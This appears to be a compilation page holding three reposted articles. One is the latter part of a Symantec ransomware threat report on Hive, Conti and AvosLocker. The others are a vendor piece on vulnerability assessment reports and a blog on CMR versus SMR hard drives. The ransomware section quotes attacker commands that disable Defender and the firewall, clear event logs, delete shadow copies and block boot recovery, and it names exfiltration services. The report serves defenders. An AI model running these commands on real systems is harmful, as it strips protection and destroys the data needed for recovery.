reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe delete aHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f

reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /

Disabling the default Windows firewall is also one of the techniques we have seen being used by these ransomware families:

netsh advfirewall set allprofiles state off

To cover their tracks on a victim system the actors may also clear the Windows event log:

wevtutil.exe cl system

wevtutil.exe cl security

wevtutil.exe cl application

powershell -command “Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }”

Impact

Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:

vssadmin.exe delete shadows /all /quiet

wmic.exe shadowcopy delete

We have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

In some instances the actors delete the safe mode settings in the registry to stop security product services from starting in safe mode:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\<service> /f

Exfiltration

Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:

https://anonfiles.com
https://mega.nz
https://send.exploit.in
https://ufile.io
https://www.sendspace.com

We have also seen attackers use the following tools for data exfiltration:

Filezilla
Rclone

Conclusion

The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.

Symantec Protection

Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.

AV Protection

Ransom.Hive
Ransom.Conti
Ransom.AvosLocker
Backdoor.Cobalt
Hacktool.Mimikatz
Trojan.IcedID*
Trojan.Emotet*
W32.Qakbot*
Trojan.Trickybot*

Behavioral Protection

SONAR.RansomHive!g2
SONAR.RansomHive!g3
SONAR.RansomHive!g4
SONAR.RansomAvos!g2
SONAR.RansomConti!g1
SONAR.RansomConti!g3
SONAR.RansomConti!g4
SONAR.Ransomware!g30
SONAR.RansomGregor!g1
SONAR.SuspLaunch!gen4
SONAR.SuspLaunch!g18
SONAR.Ransom!gen59
SONAR.Ransomware!g26
SONAR.Cryptlck!g171

Intrusion Prevention System (IPS) detections

IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.

The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.

Symantec recommends that you have intrusion prevention enabled on all your devices including servers.

Adaptive Protection

Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.

Recommendations

Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.

Source :
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

Everything you need to know to create a Vulnerability Assessment Report

You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”

Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.

As it’s likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn’t a moment to waste. So let’s drive straight in.

What is a Vulnerability Assessment Report and why do you need one?

A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.

A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.

The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:

— Customers need to trust you

Weaknesses in your IT systems could affect your customers’ operations. With supply chain attacks on the rise, a vulnerability in a single company could leave the whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.

It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.

— The Board wants a better understanding of the business’ risk

Cyber security is a growing concern across many businesses, so chances are your board members want to take a better grip of their risk, before the lack of insights into vulnerabilities is turned into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an “all clear” report, can give your business heads that needed peace of mind.

— Your auditors are checking for compliance

Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.

— Your CFO is renewing your cyber insurance

It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.

How often do you need to produce a vulnerability assessment report?

Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.

Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.

Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.‍

A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.

What should be included in a vulnerability assessment report?

Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.

As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.

Where can you get a Vulnerability Assessment Report from?

Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise; which can distract your security teams from other activities that will keep your organisation secure. That is why it’s recommended to choose an external provider to produce your reports.

Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.

Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.

At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.

Source :
https://thehackernews.com/2022/04/everything-you-need-to-know-to-create.html

CMR vs SMR drives – what to pick? How to tell?

Buying a hard disk used to be quite easy. Now we have stuff like CMR vs SMR drives, manufacturers not being completely clear in their product showcase pages, and so on.

TLDR: To keep things short, you should strive to buy a CMR drive because SMR drives, while they work just fine, are usually slower in every typical individual test carried by a lot of people out there. SMR drives are slower as their method of writing data aims for storage density, and one of the drawbacks of this goal is speed.

And before we continue, yes, even if manufacturers have developed firwmare that optimize the read and write performance for SMR drives, they are still not that great as a CMR drive.

Tip: some great benchmarks for hard disk drives are: Crystal Disk Mark, ATTO Disk Benchmark, HD Tune, and even PCMark has some storage benchmarks.

CMR or PMR drives – how they work

CMR comes from Conventional Magnetic Recording. It is also known as PMR that comes from Perpendicular Magnetic Recording.

The way CMR works is by aligning the poles of the magnetic elements, which represent bits of data perpendicularly to the surface of the disk. The magnetic tracks are written side-by-side without overlapping.

a great image explanation from Synology for CMR / PMR drives

And because the write head is usually quite large in comparison to the read head, HDD manufacturers aim to shrinking the size of the write head – or do it as much as possible.

SMR – how do these drives work?

Shingled Magnetic Recording, or SMR, is an extension to PMR. It basically offers improved density. And this happens because rather than writing each magnetic track without overlapping, SMR overlaps each new track with part of the previous track. One way to think about it is by comparing it to the shingles on a roof.

a great image explanation from Synology for SMR drives

By overalapping the tracks, write heads become a lot thinner, and we get a bigger areal density.

CMR vs SMR drives – why does it actually matter?

In short, because you want the best performance for your dollar.

But to get a little bit more technical, regardless of whether an HDD uses CMR or SMR when some new data is written on the drive, the tracks are fully readable without performance impact.

So we have a pretty good read speed, right? No matter what we choose? Right? Kind of. Not really. Well, it depends on how you use the drive.

But! On an SMR drive, when any data is edited or overwritten, the write head will not overwrite data on the existing magnetic track. It will write the new data on an empty area of the disk. While the original track with the old data will temporarily sit put. Then, when the SMR HDD becomes idle, it will enter a ‘reorganization mode’, where the old bits of data on the original track are being erased and made available for future use.

This reorganization procedure must occur and makes idle time essential on an SMR drive. If you hit the respective SMR drive hard with write and read operations, it won’t get to do this in a fast way, and the drive will have to write new data and reorganize stuff at the same time. This causes an impact on the overall read and write performance of the drive.

How can I tell if the HDD I want to buy is SMR or CMR?

Some manufacturers make it easy, some not so much. But basically, searching with something like ‘product code SMR or CMR’ on Google will lead you to a good result most of the time.

Now, Western Digital, on their homepage in the shop section, actually lists CMR or SMR for their drives in the ‘Full Specifications’ area, at the Recording Technology specification. Neat!

For Seagate, however, you have to go to the product page, and download the PDF datasheet. Oh well, I guess it works.

Here’s a breakdown of what is what usually, at least for the common models. Please, search online or on the manufacturer’s website in case the below data becomes outdated. It was last looked up in 29.01.2022, on the manufacturers’ websites, just so you know.

Manufacturer	Model	Capacity	Recording technology
Seagate	Iron Wolf Pro*1	Any	CMR
Seagate	Iron Wolf*2	Any	CMR
Seagate	Barracuda Compute*3	Any	SMR
Western Digital	Purple*4	Any	CMR
Western Digital	Red Plus*5	Any	CMR
Western Digital	Red – WD20EFAX	2 TB	SMR
Western Digital	Red – WD30EFAX	3 TB	SMR
Western Digital	Red – WD40EFAX	4 TB	SMR
Western Digital	Red – WD60EFAX	6 TB	SMR

*1 = ST4000NE001, ST6000NE000, ST8000NE001, ST10000NE000, ST10000NE0008, ST12000NE0008, ST14000NE0008, ST16000NE000, ST18000NE000, ST20000NE000

*2 = ST1000VN002, ST2000VN004, ST3000VN007, ST3000VN006, ST4000VN008, ST4000VN006, ST6000VN001, ST8000VN004, ST10000VN000, ST10000VN0008, ST12000VN0008

*3 = ST500LM030, ST500LM034, ST1000LM048, ST1000LM049, ST2000LM015, ST3000LM024, ST4000LM024, ST5000LM000

*4 = WD10PURZ, WD20PURZ, WD22PURZ, WD30PURZ, WD40PURZ, WD42PURZ, WD60PURZ, WD62PURZ, WD63PURZ, WD84PURZ, WD102PURZ, WD121PURZ, WD140PURZ

*5 = WD10EFRX, WD20EFZX, WD30EFZX, WD40EFZX, WD60EFZX, WD80EFBX, WD80EFZX, WD101EFBX, WD120EFBX, WD140EFGX

When does buying a SMR drive make sense?

My opinion is that never.

But if you get an amazing price, and you know that hard drive will not get a lot of writes, edits, and deletions… well, it might make sense since the actual heavy usage of erasing,editing and writing data is causing the ‘slowness’. Like if you were to just fill it up with movies and that’s it. Those movies will not get edited, deleted or anything – they will just be read when you watch them. I guess – thinking about selfhosting something like Plex or Nextcloud… or a DIY NAS. I’d still opt for a CMR drive – what kind of discount are we talking about, to be fair? 10% is not worth it in my opinion.

Closing thoughts

Basically, aim for a CMR drive. And if you are new to the whole computer parts upgrade or stuff… don’t stress if you are buying a NAS drive for your desktop PC. It does not matter, it will work the same – maybe even last longer!

Hard disk buying is now as tedious as buying another component, I guess – one more thing to look for besides the usual specifications. I do hope that testing, developing, and working with diverse methods and technologies of storing data will eventually lead to manufacturers developing more performant and higher density hard disks. Just imagine a 100 TB HDD! That would be insane.

I hope this article helped you figure out what you need – an SMR or a CMR drive and why it matters.

Source :
https://techie-show.com/cmr-vs-smr-drives/